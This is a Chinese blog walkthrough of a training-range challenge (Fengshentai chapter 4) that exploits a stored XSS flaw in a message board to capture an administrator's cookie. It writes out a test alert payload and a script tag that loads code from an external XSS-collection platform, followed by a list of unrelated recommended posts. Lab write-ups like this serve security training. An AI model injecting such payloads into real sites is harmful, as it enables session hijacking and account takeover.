封神台-安全演练靶场第四章通关方法

mysy 2019-11-12 原文

封神台-安全演练靶场第四章通关方法

第四章:为了更多的权限!留言板!!【配套课时:cookie伪造目标权限 实战演练】

 

 

 

说明:从给的tips中可以知道留言板功能存在XSS存储型漏洞,那么首先要建造包含xss攻击语句,可以不用自建xss平台,用网上的xss平台就行:http://xsspt.com/index.php?do=login

 

 

 

1.首先先去注册,邮箱建议随便写个就行,不要用真实的,注册后,登录系统。

 

 2.然后去创建我的项目,勾选上前两项,然后点击下一步就会创建完成,生成代码。

 

 

 

 

 

 3.去留言板,首先查找出具有xss漏洞的地方,输入<script>alert(‘2019你好’)</script>,并且提交留言,如果提交后页面能弹窗出内容,那么就说明该处有xss漏洞(此次是主题框具有xss漏洞),然后就可以复制步骤2中生成的xss代码,比如在主题中输入:<script src=http://xsspt.com/l4dvXB></script>,其余内容填写后,提交留言,并且去查看留言。

 

 

 

 

 

 4.最后来到xss平台,查看接收到平台模拟的管理员访问记录。

 

 

 

posted on
2019-11-12 17:15 myhsy 阅读() 评论() 编辑 收藏

 

版权声明:本文为mysy原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/mysy/p/11843380.html

封神台-安全演练靶场第四章通关方法的更多相关文章

随机推荐

  1. 最佳实践 | 源码升级gcc

    1、下载升级包所需软件 boost_1_60_0.tar.gz http://www.boost.org/us […]...

  2. Andorid PowerManger 电源管理

    极力推荐Android 开发大总结文章:欢迎收藏程序员Android 力荐 ,Android 开发者需要的必备 […]...

  3. sql优化–in和exists效率

    in 和exists in是把外表和内表作hash 连接,而exists 是对外表作loop 循环,每次loo […]...

  4. 世界最全的咖啡知识

    拿铁咖啡 拿铁咖啡是意大利浓缩咖啡与牛奶的经典混合,意大利人也很喜欢把拿铁作为早餐的饮料。意大利人早晨的厨房里 […]...

  5. 装纯净Windows后的一个省事方案,快速整理桌面环境 – 107国道道长

    装纯净Windows后的一个省事方案,快速整理桌面环境         对于有部分人来说,win10系统用久了 […]...

  6. 小白老凯,初出茅庐!请多关照!简单分享一些 mysql 数据库的安装操作!请给为大神雅正!

      在我们写代码,存储数据时常常会用到各种数据库,如:mysql、access、sql、server、Orac […]...

  7. 云中树莓派(5):利用 AWS IoT Greengrass 进行 IoT 边缘计算

    云中树莓派(1):环境准备 云中树莓派(2):将传感器数据上传到AWS IoT 并利用Kibana进行展示 云 […]...

  8. 【python 数据结构】相同某个字段值的所有数据(整理成数组包字典的形式)

        class MonitoredKeywordMore(APIView): def post(self, […]...

展开目录

目录导航